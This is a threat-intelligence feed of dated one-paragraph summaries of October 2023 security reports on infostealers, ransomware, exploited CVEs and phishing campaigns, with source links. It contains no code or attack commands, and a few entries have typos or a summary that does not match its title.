- Cyfirma
- Intel Name:
- A_Python_Based_Info_stealer_Akira
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- Cyfirma analysts provided a comprehensive investigation report of this Akira information stealer malware, unfolding its functionality and capabilities.
Source:
https://www.cyfirma.com/outofband/akira-stealer-an-undetected-python-based-info-stealer/
—
- Intel Source:
- Okta
- Intel Name:
- Customer_Data_Exposed_by_Okta_Support_System_Breach
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- The identity services company Okta have revealed a fresh security incident in which it became possible for unknown threat actors to gain access to its support case management system by using credentials that they had stolen. Note that the Okta support case management system is distinct from the production Okta service, which is up and running and unaffected. The threat actor was able to examine files uploaded by specific Okta customers as part of recent support cases.
Source:
https://sec.okta.com/harfiles
—
- Intel Source:
- Anomali
- Intel Name:
- RomCom_4_0_Targeted_Female_Politicians
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- The article discusses the US Health Sector Cybersecurity Coordination Center’s report on the NoEscape ransomware, ShellBot DDoS bot, and Tropical ScorpiusVoid cyberespionage group. It recommends having a comprehensive and tested backup solution, running the most current software version, and practicing defense-in-depth. It also lists various MITRE ATT&CK techniques and tags associated with each threat.
—
- Intel Source:
- Sentilone
- Intel Name:
- Traditional_and_modern_threat_hunting_methodologies
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- This article discusses traditional and modern threat hunting methodologies, emphasizing the need for experienced professionals and effective tooling. It provides examples of successful hunts, such as the SolarWinds SERV-U Vulnerability and the Akira ransomware campaign, and outlines the use of advanced tools, AI/machine learning algorithms, and threat intelligence integration.
Source:
https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/
—
- Intel Source:
- Trellix
- Intel Name:
- The_analyzes_of_malware_that_abuses_Discord_infrastructure
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- Malicious actors are using Discord’s Content Delivery Network (CDN) and webhooks to download additional files and exfiltrate information. A sample targeting Ukrainian critical infrastructures was recently discovered, indicating that APT groups may be using Discord. Technical analysis of the sample was provided, along with detection and IoCs. Loaders written in .NET are the most popular malware families using Discord’s CDN, and function-level retro-hunting was used to identify them.
Source:
https://www.trellix.com/en-au/about/newsroom/stories/research/discord-i-want-to-play-a-game/
—
- Intel Source:
- withsecure
- Intel Name:
- DarkGate_malware_infection_attempts
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- This article discusses the DarkGate malware campaign, which is related to the Ducktail campaigns and is conducted by Vietnamese cybercrime groups. It focuses on the use of multiple different MaaS infostealers and RATs to target the digital marketing sector, with the primary goal of hijacking Facebook business accounts. It provides details on the detection of the DarkGate malware infection attempts, the lures and delivery methods used, and the use of MSI Wrapper to wrap executable files in MSI bundles.
Source:
https://labs.withsecure.com/publications/darkgate-malware-campaign
—
- Intel Source:
- Cyble
- Intel Name:
- Italian_Clipper
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- CRIL recently uncovered a malicious phishing campaign orchestrated by a threat actor targeting Italian-speaking users. The campaign employed various techniques, including droppers, obfuscators, crypters, fileless malware, crypto address theft, and exfiltration via Discord. The malware, Pure Clipper, was designed to steal or manipulate cryptocurrency-related data, such as wallet addresses. The threat actor used a .NET dropper concealed by SmartAssembly, which included a legitimate Tor Installer and a PureCrypter binary. The Clipper was designed to steal cryptocurrency addresses and interact with the TA’s Command and Control (C&C) system through Discord. The operation also showcased persistence through Registry manipulation and Task Scheduler entries.
Source:
https://cyble.com/blog/fileless-pure-clipper-malware-italian-users-in-the-crosshairs/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Novel_Low_Cost_Cybercrime_Tool_Is_Introduced
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers from FortiGate have discovered that ExelaStealer is essentially an open-source InfoStealer that the threat actor can customize for a fee. Although it uses resources from other languages (like JavaScript) when necessary, it is written in Python. Sensitive data, including credit card numbers, passwords, cookies, session data, and basic keylogging, can be stolen from a Windows-based host.
Source:
https://www.fortinet.com/blog/threat-research/exelastealer-infostealer-enters-the-field
—
- Intel Source:
- vmware
- Intel Name:
- An_Analysis_of_Malware_as_a_Service_on_the_Dark_web
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- LummaStealer is a Malware-as-a-Service (MaaS) available on the dark web that has been observed evolving from underground platforms to more public hacker forums. This article explores the history of LummaStealer and its attack vectors, including the distribution of the malware through deceptive sites, drive-by downloads, and masquerading as browser updates. It also discusses LummaStealer’s dark web presence, multiple sellers, and Russian origin.
Source:
https://blogs.vmware.com/security/2023/10/an-ilummanation-on-lummastealer.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_New_Tactic_For_BlackCat_Ransomware
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have noticed that the BlackCat/ALPHV ransomware operation has started to use a new tool called “Munchkin,” which uses virtual machines to covertly install encryptors on network devices. Manchkin makes it possible for BlackCat to operate on distant systems and encrypt network shares such as Common Internet File System (CIFS) or Server Message Block (SMB).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Fake_KeePass_Site_Leveraging_Google_Ads_and_Punycode_to_Spread_Malware
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes discovered a very dishonest harmful Google ad for the open-source password manager KeePass. They have already written on how tracking templates have made it easier for people to impersonate brands these days, but this attack added another degree of deceit.
—
- Intel Source:
- Sophos
- Intel Name:
- Ransomware_actor_attacks_unsupported_ColdFusion_servers
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- An unknown actor attempted to deploy ransomware on obsolete Adobe ColdFusion servers using leaked LockBit 3.0 source code. Sophos X-Ops blocked the attack with endpoint behavioral detections. The attacker left a directory listing of artifacts and hashes, which revealed the intended ransomware payload. The ransom note credited “BlackDog 2023” and demanded 205 Monero.
—
- Intel Source:
- Cado Security
- Intel Name:
- Qubitstrike_Targeting_Jupyter_Notebooks
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- A threat actor linked to a recent effort that targets unprotected Jupyter Notebooks is likely from Tunisia. The campaign aims to compromise cloud infrastructures and mine cryptocurrencies illegally. The Qubitstrike campaign’s payloads are all hosted on codeberg.org, a substitute Git hosting service that offers a lot of the same features as GitHub.
Source:
https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
—
- Intel Source:
- Cyble
- Intel Name:
- BbyStealer_malware_campaign_resurfaces
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- Cyble researchers has discovered a malware that uses multiple phishing domains to target users who are downloading Virtual Private Network (VPN) Windows applications. In this campaign, the downloaded VPN application is used to disseminate an information-stealing malware known as “BbyStealer.”
Source:
https://cyble.com/blog/bbystealer-malware-resurfaces-sets-sights-on-vpn-users/
—
- Intel Source:
- Kaspersky
- Intel Name:
- Updated_MATA_Targeting_Eastern_European_Industrial_Firms
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- The attackers targeted a number of victims with spear-phishing emails; some of them downloaded files using an internet browser and became infected with Windows executable malware. A link to an external page that downloads a remote page with the CVE-2021-26411 vulnerability can be found in every phishing document. Through September 2022, the attackers persisted in sending infected documents over email. The campaign ran for a total of six months, ending in May 2023.
—
- Intel Source:
- Securelist
- Intel Name:
- The_new_threat_to_B2B
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- Malicious executable IntelSvc.exe is capable of executing commands, creating folders, and storing configuration files and logs. The conclusion emphasizes the importance of strong security systems in the B2B sector, as cybercriminals are constantly looking for ways to exploit resources for financial gain. Statistics show that since May 2023, over 200 users worldwide have been targeted, with the most frequent attacks occurring in Russia, Saudi Arabia, Vietnam, Brazil, and Romania. Money-making scripts use infected devices to mine Monero cryptocurrency, a keylogger to track keystrokes, and a backdoor to send requests to the C2 server.
Source:
https://securelist.com/miner-keylogger-backdoor-attack-b2b/110761/
—
- Intel Source:
- Google Blog
- Intel Name:
- State_Actors_Targeting_WinRAR_Flaw_In_Multiple_Campaigns
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Google Threat Analysis Group have seen numerous government-sponsored hacking groups taking advantage of WinRAR, a well-known file archiver program for Windows, and its known vulnerability, CVE-2023-38831. When the flaw was still unknown to defenders in early 2023, cybercrime groups started taking use of it. Although there is now a fix available, many users appear to still be at risk. TAG has seen actors with government support from several nations taking advantage of the WinRAR vulnerability in their activities.
Source:
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Hackers_Using_Google_Ads_to_Distribute_Weaponized_Notepad
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- It is well known that cybercriminals use deceptive advertising strategies to target the popular Windows text editor Notepad++. This can result in malware and ransomware spreading. It seems to have totally escaped detection for at least a few months, according to Malwarebytes. Its capacity to distribute time-sensitive payloads and collect user fingerprints makes it special.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_From_North_Korea_Exploiting_TeamCity_Vulnerability
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Microsoft have discovered that two nation-state threat actors from North Korea, known as Diamond Sleet and Onyx Sleet, are taking advantage of CVE-2023-42793, a remote-code execution vulnerability that affects several JetBrains TeamCity server versions. Organizations utilize TeamCity, a continuous integration/continuous deployment (CI/CD) platform, for DevOps and other software development tasks.
—
- Intel Source:
- Symantec
- Intel Name:
- Crambus_Hackers_Targeting_Middle_Eastern_Government
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Between February and September of 2023, the Iranian Crambus espionage group (also known as OilRig, MuddyWater, and APT34) orchestrated an eight-month-long incursion against a Middle Eastern nation. In one instance, the attackers installed a PowerShell backdoor called PowerExchange, which is utilized to monitor incoming emails sent from an Exchange server in order to execute commands sent by the attackers in the form of emails and covertly forward results to the attackers. The attackers also stole files and passwords during the compromise. At least 12 machines saw malicious activity, and there is proof that the attackers installed backdoors and keyloggers on numerous additional computers.
—
- Intel Source:
- Elastic
- Intel Name:
- A_New_Backdoor_Targeting_ASEAN_Organizations_And_Governments
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- The innovative BLOODALCHEMY backdoor, which is part of the REF5961 intrusion set employed by a China-linked threat operation, is being utilized to attack x86 systems belonging to governments and other organizations that are members of the Association of Southeast Asian Nations.
Source:
https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor
—
- Intel Source:
- Vulncheck
- Intel Name:
- Vulnerabilities_in_Milesight_Industrial_Cellular_Routers
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- A recent disclosure of CVE-2023-43261 highlights vulnerabilities in Milesight’s industrial cellular routers, potentially exposing industrial control system (ICS) networks to the internet. This article explores how these routers are used in various critical infrastructure scenarios, the specifics of the vulnerability, and the extent of its impact in the wild. While the CVE description is misleading, we find that the actual number of vulnerable routers in the wild is relatively low. Nonetheless, some evidence suggests that exploitation is likely occurring, although not at a large scale.
Source:
https://vulncheck.com/blog/real-world-cve-2023-43261
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_Global_View_of_LATAM_Threats
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- Researchers from ESET have discovered an increase in evasion techniques and high-value targets in threats affecting the LATAM region.
Source:
https://www.welivesecurity.com/en/eset-research/operation-king-tut-universe-threats-latam/
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Controls_Infected_Systems_Using_RDP
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- Researchers from ASEC have been keeping an eye on recent incidents in which the Kimsuky group allegedly used spear phishing to install BabyShark before putting various RDP-related malware strains in place. The tools employed in the attacks share characteristics with those in earlier occurrences, however based on their PDB information, it is assumed that they were very recently constructed for attack usage.
—
- Intel Source:
- Symantec
- Intel Name:
- Grayling_new_threat_actor_targets_organizations_in_Taiwan
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- There was an observation of new advanced persistent threat group used custom malware and multiple publicly available tools to target a number of organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team lined this activity a new group we are calling Grayling. This activity stood out due to the use by Grayling of a distinctive DLL sideloading technique that uses a custom decryptor to deploy payloads.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Cisco_Discovers_Critical_Vulnerability_Exploitation_in_IOS_XE_Software
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- Cisco has detected an active exploit of a critical vulnerability (CVE-2023-20198) in the Web User Interface feature of Cisco IOS XE software, potentially giving attackers full control of affected devices. Suspicious activity was first observed on September 18, with an implant deployed on October 12. Cisco advises immediate action to mitigate this threat, including disabling the HTTP server on internet-facing systems
Source:
https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
—
- Intel Source:
- Securelist
- Intel Name:
- Analysis_of_Alleged_Hack_of_Israeli_Power_Station_Amid_Ongoing_Conflict
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- The text delves into the cyber activities associated with the Israel-Hamas conflict, including distributed denial-of-service (DDoS) attacks, information warfare, and hacktivism campaigns. It highlights a recent purported hack of the Dorad private power station by a group called Cyber Av3ngers. However, upon analysis, the data presented by Cyber Av3ngers was found to be sourced from an older breach by a separate hacktivist group known as Moses Staff. Moses Staff, allegedly an Iranian hacker group, primarily targets Israeli companies and other organizations globally.
Source:
https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/
—
- Intel Source:
- Paloaltonetworks
- Intel Name:
- XorDDoS_Trojan_Campaign
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- Paloaltonetworks researchers spotted recent campaign involving the XorDDoS Trojan has drawn attention as attackers manipulate Linux devices to execute remote malicious activities. In this report, an in-depth investigation reveals concealed command and control (C2) network infrastructure, showcasing a shift towards legitimate public hosting services.
Source:
https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware/
—
- Intel Source:
- Wordfence
- Intel Name:
- Critical_Unauthenticated_Arbitrary_File_Upload_Vulnerability
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- The Royal Elementor Addons and Templates WordPress plugin is used by over 200,000 websites. The Wordfence Threat Intelligence Team discovered a vulnerability in the plugin that was recently patched, allowing unauthenticated attackers to upload any file to a compromised website.
—
- Intel Source:
- Aitime.Space
- Intel Name:
- Phishing_abuse_the_marketing_tool_Smart_Links
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Aitime news shared the information about the attack that is not first and uses and abuses Smart Links. The threat actor this time used advanced steps in his hacking and used the URL of such a tool to bring it into the recipient’s email address in the URL link of the phishing website.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Examining_In_Depth_Dark_Angels_Ransomware
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have provided technical information about the Dark Angels ransomware, compared samples of RagnarLocker and Dark Angels, and offered advice for security teams protecting ESXi servers.
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_MedusaLocker_Ransomware
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers at QuickHeal have examined and offered defense tactics against the ransomware known as MedusaLocker, which initially appeared in the middle of 2019. The hospital and healthcare sectors are its main targets. MedusaLocker encrypts the data of its victims using RSA and AES encryption methods.
—
- Intel Source:
- Cluster25
- Intel Name:
- Pro_Russian_Hackers_Exploiting_WinRAR_Vulnerability
- Date of Scan:
- 2023-10-17
- Impact:
- MEDIUM
- Summary:
- A newly discovered security flaw in the WinRAR archiving tool has been taken advantage of by pro-Russian hacker groups as part of a phishing effort aimed at obtaining login credentials from compromised systems.The attack uses malicious archive files to take advantage of a recently identified vulnerability (CVE-2023-38831) that affects WinRAR compression software versions older than 6.23.
Source:
https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack
—
- Intel Source:
- Cloudflare
- Intel Name:
- Malicious_Impersonation_and_Data_Theft_attack_Targeting_RedAlert
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Cloudflare’s Cloudforce One Threat Operations Team discovered a malicious website impersonating the RedAlert – Rocket Alerts application, which provides crucial alerts about incoming airstrikes in Israel. This attack comes in the wake of recent cyber threats against rocket alert applications used in the region. The malicious website offered a fake Android version of the RedAlert app that, when downloaded, collected sensitive user data. We provide an analysis of the malicious APK’s capabilities and the methods it uses to avoid detection.
—
- Intel Source:
- Trellix
- Intel Name:
- The_New_Frontier_of_Evasive_Attacks
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Malicious actors have escalated the use of QR codes in phishing campaigns to bypass email security products. The blog delves into two distinct attack campaigns, each utilizing QR codes for evasion. Campaign 1 targets Microsoft Account holders, employing QR codes in email bodies to trick victims. Campaign 2 capitalizes on Chinese Government subsidy claims with QR codes embedded directly in emails.
—
- Intel Source:
- Proofpoint
- Intel Name:
- The_State_of_Current_Fake_Browser_Updates
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- The numerous threat clusters that use fake browser update-related themes are being monitored by Proofpoint. False browser updates take advantage of consumers’ confidence by using compromised websites and a bait that is specific to each user’s browser to make the update appear legitimate and trick users into clicking.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Lumma_Stealers_Stealthy_Invasion
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have found cybercriminals are leveraging Discord, a popular chat platform among gamers and content creators, to distribute the information-stealing malware known as Lumma Stealer. Malicious actors manipulate Discord’s infrastructure to host and spread this malware while using the platform’s API to create bots for remote control
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Providers_Are_Target_of_Destructive_Cyberattacks
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Public sources state that between May 11, 2023, and September 27, 2023, an organized group of attackers—followed by the identifier UAC-0165—interferred with the information and communication systems (ICS) of no fewer than 11 Ukrainian telecommunications providers. This interfered with the provision of services to customers, among other things.
—
- Intel Source:
- Cofense
- Intel Name:
- Voice_Message_Phishing_Campaigns_Access_Key
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Researchers at Cofense have seen a phishing effort in which the attackers used an access key in the body of the message to lure the victim into listening to the voicemail that had been left for them to review.
Source:
https://cofense.com/blog/access-key-used-in-voice-messaged-phishing/
—
- Intel Source:
- Guard Labs
- Intel Name:
- EtherHiding_Malware_Campaign_Takes_Advantage_of_Binances_Smart_Chain
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Using Binance’s Smart Chain (BSC) contracts, threat actors have been seen delivering malicious malware in what has been called the “next level of bulletproof hosting.” Guardio Labs has given the campaign, which was discovered two months ago, the name of EtherHiding.
Source:
https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
—
- Intel Source:
- CISA
- Intel Name:
- Exploit_of_Atlassian_Confluence_CVE_2023_22515
- Date of Scan:
- 2023-10-16
- Impact:
- HIGH
- Summary:
- Today, CISA, FBI, and MS-ISAC shared their Cybersecurity Advisory about the active exploitation of CVE-2023-22515. This vulnerability affects some versiovs of Atlassian Confluence Data Center and Server and letting threat actors to get initial access to Confluence instances by creating unauthorized Confluence administrator accounts. This vulnerability was exploited as zero-day to obtain access to victim systems and continue their active exploitation. It was rated as critical vulnerability and agencies suggest that it is widespread, continued exploitation due to ease of exploitation.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Domain_Name_Recorded_by_DShield_Sensor_as_Password
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- SANS researchers have discovered something unusual in the list of the Top Usernames and Passwords—multiple domain names were used as passwords—for the first time. At first, They thought there might have been a mistake in Logstash’s processing, so they looked over the raw logs to make sure everything was processed correctly and ensure data integrity.
Source:
https://isc.sans.edu/diary/Domain+Name+Used+as+Password+Captured+by+DShield+Sensor/30312/
—
- Intel Source:
- Phylum
- Intel Name:
- Malicious_NuGet_Package_Using_SeroXen_RAT_to_Target_DotNET_Developers
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- Researchers from Phylum have identified that a malicious package hosted on the.NET Framework’s NuGet package manager has the ability to distribute the remote access trojan SeroXen RAT.
Source:
https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Void_Rabisu_Targeting_Female_Political_Leaders
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have found that Void Rabisu is still working on its primary piece of malware, the ROMCOM backdoor, nearly a year after shifting its focus from opportunistic attacks with ransomware to cyberespionage.
—
- Intel Source:
- Cyble
- Intel Name:
- AgentTesla_attacks_via_CHM_and_PDF_Files
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- In recent attack campaign, Cyble researchers discovered a CHM file that has been compressed using Gzip and probably delivered using malicious spam email. The maliciousd CHM file acts as a trap. It is targeting individuals or entities linked in network engineering, telecommunications, or information technology based on the content available in the CHM file.
Source:
https://cyble.com/blog/agenttesla-spreads-through-chm-and-pdf-files-in-recent-attacks/
—
- Intel Source:
- ASEC
- Intel Name:
- Volgmer_and_Scout_Malware_Analysis_Report_from_Lazarus_Threat_Group
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- ASEC researchers have examined the first discovered version of the Volgmer backdoor as well as the subsequent version that started to be used in attacks in 2017. Next, we will examine the Scout downloader and discuss the dropper that was utilized for the Scout installation.
—
- Intel Source:
- Trend Micro
- Intel Name:
- DarkGate_Allows_Attacks_Using_Teams_and_Skype
- Date of Scan:
- 2023-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro have been keeping an eye on a campaign that exploits Teams and Skype to spread the DarkGate malware to certain companies. They also found that additional payloads were delivered into the environment once DarkGate was installed on the victim’s system.
—
- Intel Source:
- Checkpoint
- Intel Name:
- STAYIN_ALIVE_Targeting_Government_Ministries_and_Telecoms_in_Asia
- Date of Scan:
- 2023-10-12
- Impact:
- MEDIUM
- Summary:
- “Stayin’ Alive” is a campaign that Check Point Research continues to be monitoring since at least 2021. The campaign is active in Asia and mainly targeting government agencies and the telecom sector. The majority of the “Stayin’ Alive” campaign is made up of downloaders and loaders, some of which are employed as first-stage infection vectors against well-known Asian companies.
—
- Intel Source:
- Securelist
- Intel Name:
- ToddyCat_an_advanced_APT_actor
- Date of Scan:
- 2023-10-12
- Impact:
- LOW
- Summary:
- ToddyCat started their malicious activity back in 2020. This group is very advanced APT group. And responsible for attacks against high-profile organizations in Europe and Asia. Securelist researchers in their blog explaining the group’s new toolset, the malware used to steal and exfiltrate data, and the techniques used by this group to move laterally and conduct espionage operations.
Source:
https://securelist.com/toddycat-keep-calm-and-check-logs/110696/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Latest_supply_chain_attack
- Date of Scan:
- 2023-10-12
- Impact:
- LOW
- Summary:
- Last month, a “kohlersbtuh15” threat actor tried to hack to the open-source community by uploading a series of malicious packages to the PyPi package manager. It appeared that the attacker targeted developers for Aliyun services (Alibaba Cloud), telegram, and AWS.
Source:
https://checkmarx.com/blog/users-of-telegram-aws-and-alibaba-cloud-targeted-in-latest-supply-chain-attack/
https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/
—
- Intel Source:
- ASEC
- Intel Name:
- Hexadecimal_Notation_Addresses_Install_ShellBot_DDoS_Malware
- Date of Scan:
- 2023-10-12
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have found that the ShellBot malware, which is being deployed on poorly maintained Linux SSH servers, has a different way of spreading. The threat actor now uses a hexadecimal value instead of a standard IP address as the download URL to install ShellBot, but the general procedure is still the same.
—
- Intel Source:
- ASEC
- Intel Name:
- Distributing_Infostealer_with_Abnormal_Certificate
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Malware employing strange certificates has been spreading at a rapid rate lately. Malware frequently assumes the appearance of legitimate certificates. However, in this instance, the virus inserted the certificate information at random, leaving unusually long strings in the Subject Name and Issuer Name sections.
—
- Intel Source:
- Krebson Security
- Intel Name:
- The_phishing_scams_targeting_U_S_Postal_Service_customers
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Recently it was seen a rise of the phishing scams targeting U.S. Postal Service customers. Krebson Security analysts made a conclusion that there are an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
Source:
https://krebsonsecurity.com/2023/10/phishers-spoof-usps-12-other-natl-postal-services/
—
- Intel Source:
- Cyble
- Intel Name:
- The_deployment_of_Mythic_Athena_Agent
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new spear phishing email targeting a leading Russian semiconductor supplier. The hackers were taking advantage of a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver their payload on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- AvosLocker_Ransomware_Update
- Date of Scan:
- 2023-10-11
- Impact:
- HIGH
- Summary:
- FBI and CISA released today an update on AvosLocker Advisory to distribute known indicators of compromise, tactics, techniques, and procedures (TTPs), and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023.
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- The_distribution_of_new_spotted_AgentTesla_Infostealer
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- ASEC has discovered the AgentTesla Infostealer that was distributed through an email in the form of a malicious BAT file.
—
- Intel Source:
- AT&T
- Intel Name:
- An_increase_usage_of_phishing_emails_containing_malicious_QR
- Date of Scan:
- 2023-10-11
- Impact:
- LOW
- Summary:
- Last couple months, AT&T SOC analysts observed an increase in the usage of phishing emails containing malicious QR codes. One of customer as example was victimized by a phishing attempt provided the AT&T analysts with an email that was circulated to several of its internal users.
—
- Intel Name:
- Targets_on_unpatched_tagDiv_plugin
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- Sucuri researchers team observed new waves of Balada malware injections on websites that were actively using tagDiv themes. Sucuri shared their examantion of these waves of ongoing massive Balada Injector campaign. Additionally they provided the technical details of the injected scripts found in each wave, exploring their functionality and the potential dangers they pose to site administrators.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer_Distributing_via_Spam_Email
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- ASEC researchers have spotted the AgentTesla Infostealer distributing via an email in the form of a malicious BAT file. When the BAT file is executed, it employs the fileless method to run AgentTesla (EXE) without creating the file on the user’s PC. This blog post will provide an explanation of the distribution process, from the spam email to the final binary (AgentTesla), along with related techniques.
—
- Intel Source:
- Symantec
- Intel Name:
- An_Unknown_Threat_Actor_Targeting_Several_Taiwanese_Organizations
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- Targeting businesses in Taiwan’s manufacturing, IT, and biomedical industries, a previously unidentified advanced persistent threat (APT) group employed proprietary malware and other openly accessible tools. Organizations in Vietnam, the United States, and the Pacific Islands government agency all seem to have been targeted as part of this operation. Up until at least May 2023, this activity was ongoing and started in February 2023.
—
- Intel Source:
- Fortinet
- Intel Name:
- RCE_Campaign_Hacks_Routers_Into_Botnets
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- A campaign called IZ1H9 has intensified the development of malware to target a variety of unpatched routers and IoT devices and add them to a growing botnet used to perform targeting DDoS cyberattacks. FortiGuard Labs researchers have discovered the campaign, which recently added 13 new payloads that took advantage of vulnerabilities in Yealink Device Management, Zyxel devices, TP-Link Artcher, Korenix Jetwave, and Totolink routers as well as known vulnerabilities in D-Link devices, Netis wireless routers, Sunhillo SureLine, and Geutebruck IP cameras.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magecart_Campaign_Exploits_404_Pages
- Date of Scan:
- 2023-10-10
- Impact:
- LOW
- Summary:
- Large companies in the food and retail industries are among the many websites that a Magecart web skimming campaign is targeting, according to the Akamai Security Intelligence Group. This campaign distinguishes out due to its three sophisticated concealment strategies, one of which we had never seen before and which presents particular difficulties for identification and mitigation (particularly, changing the website’s normal 404 error page to disguise harmful code).
Source:
https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Harvesting_of_Credentials_For_NetScaler_Gateway
- Date of Scan:
- 2023-10-09
- Impact:
- LOW
- Summary:
- Attackers were using the CVE-2023-3519 vulnerability to target unpatched NetScaler Gateways in September 2023 and inject a malicious script into the HTML code of the authentication web page in order to capture user credentials. The effort is yet another illustration of how cybercriminals’ interest in credentials has grown. According to the 2023 X-Force cloud threat report, stolen credentials were used in 67% of cloud-related incident response engagements.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0006_Group_Using_SmokeLoader_Malware
- Date of Scan:
- 2023-10-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified at least four waves of cyberattacks carried out by the UAC-0006 group using the SmokeLoader malware. Legitimate compromised email addresses are used to send emails, and SmokeLoader is delivering to computers in several way.
—
- Intel Source:
- https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
- Intel Name:
- Examining_the_Snake_Keylogger
- Date of Scan:
- 2023-10-09
- Impact:
- LOW
- Summary:
